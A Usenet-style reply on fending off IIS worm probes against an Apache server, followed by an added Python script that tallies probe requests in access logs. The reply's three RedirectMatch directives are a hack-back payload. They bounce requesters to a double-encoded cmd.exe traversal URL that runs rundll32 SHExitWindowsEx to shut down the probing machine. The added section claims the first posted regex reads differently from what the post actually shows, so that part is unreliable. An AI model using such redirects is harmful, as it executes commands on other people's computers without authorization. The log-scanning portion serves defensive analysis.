Anthony Argyriou wrote:
> Problem: People who think my server is IIS and trying to get various *.exe
> and *.dll files in an attempt to compromise the server. The directory path
> used varies a lot, usually into directories that don't exist on my server.
>
> Preferred solution: have all requests ending in *.exe or *.exe?*
> (similarly for .dll) fetch back a file telling them to go bugger off.
> (I have some ideas about that - there's a simple file that's supposed to
> GPF IE, but I'm not sure that the script kiddies are using IE.)
These are likely scripts and/or worms; there's nobody at the other end
watching the page's output. The following should actually shut down the
machine making the request if it is a Windows NT/2K/XP machine, which
should raise a flag to the admin, who will then try to find out why it is
doing that and fix it if it is an infected server.
Try this (note that there are only three directives here, each with its
target URL on the same line):
# Probe paths used by Code Red / Nimda-style IIS worms. The dot is escaped
# and the leading slash is literal so each pattern matches only that file name.
RedirectMatch (.*)/default\.ida$ http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
RedirectMatch (.*)/root\.exe$ http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
RedirectMatch (.*)/cmd\.exe$ http://127.0.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx%201
Put these inside an <IfModule mod_alias.c> block to avoid config errors.
--
Justin Koivisto - spam.TakeThisOut@koivi.com
PHP POSTERS: Please use comp.lang.php for PHP related questions,
alt.php* groups are not recommended.
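An added example, not code from either poster: the admin in the thread wants to know who is sending these IIS worm probes. The script below parses Apache combined-format access-log lines, flags the request paths the thread names (default.ida, root.exe, cmd.exe and the double-encoded ..%255c traversal) and tallies them per client IP. It also checks the first RedirectMatch regex exactly as it appeared in the post, `(.*)\default.ida$`, the way PCRE (which Apache 2.x uses, and which Python's `re` follows here) reads it: `\d` is the digit class, so that pattern never matches `/default.ida`. The log lines in SAMPLE_LOG are constructed for this example; the IPs and timestamps are invented.

```python
"""Added example: tally IIS worm probes in Apache combined-format log lines
and check the posted RedirectMatch regex under PCRE rules.
SAMPLE_LOG below is constructed for this example.
"""
import re
from collections import Counter, defaultdict

# Apache "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Probe signatures: literal slash, escaped dot, applied to the path with the
# query string removed (which is also what RedirectMatch sees).
PROBES = {
    "code-red default.ida": re.compile(r"/default\.ida$", re.I),
    "root.exe backdoor":    re.compile(r"/root\.exe$", re.I),
    "cmd.exe request":      re.compile(r"/cmd\.exe$", re.I),
    "..%255c traversal":    re.compile(r"%255c", re.I),
}

# The first rule exactly as posted. Under PCRE "\d" is the digit class, so this
# matches "/1efault.ida" but never "/default.ida".
POSTED_PATTERN = re.compile(r"(.*)\default.ida$")


def classify(url):
    """Return the probe names whose pattern matches the request path (query string stripped)."""
    path = url.split("?", 1)[0]
    return [name for name, rx in PROBES.items() if rx.search(path)]


def posted_pattern_matches(path):
    """True if the RedirectMatch regex from the post, read as PCRE, matches this path."""
    return POSTED_PATTERN.search(path) is not None


def scan(lines):
    """Parse log lines; return {ip: Counter(probe_name -> hits)} for clients that sent probes."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, skip it
        for name in classify(m.group("path")):
            hits[m.group("ip")][name] += 1
    return dict(hits)


# Constructed sample: two probing hosts and two ordinary visitors.
SAMPLE_LOG = [
    '10.0.0.7 - - [19/Sep/2001:10:12:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858=a HTTP/1.0" 404 276 "-" "-"',
    '10.0.0.7 - - [19/Sep/2001:10:12:02 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"',
    '10.0.0.9 - - [19/Sep/2001:10:12:03 -0500] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"',
    '10.0.0.9 - - [19/Sep/2001:10:12:04 -0500] "GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 276 "-" "-"',
    '192.168.1.20 - - [19/Sep/2001:10:13:00 -0500] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '192.168.1.21 - - [19/Sep/2001:10:13:05 -0500] "GET /downloads/setup.exe HTTP/1.1" 200 81920 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, counts in sorted(scan(SAMPLE_LOG).items()):
        print(ip, dict(counts))
    print("posted regex matches /default.ida:", posted_pattern_matches("/default.ida"))
```

Feed it your real access log with `scan(open("access_log"))`; a legitimate download such as `/downloads/setup.exe` is not flagged because only the three worm file names and the `%255c` sequence are matched, not every `.exe`.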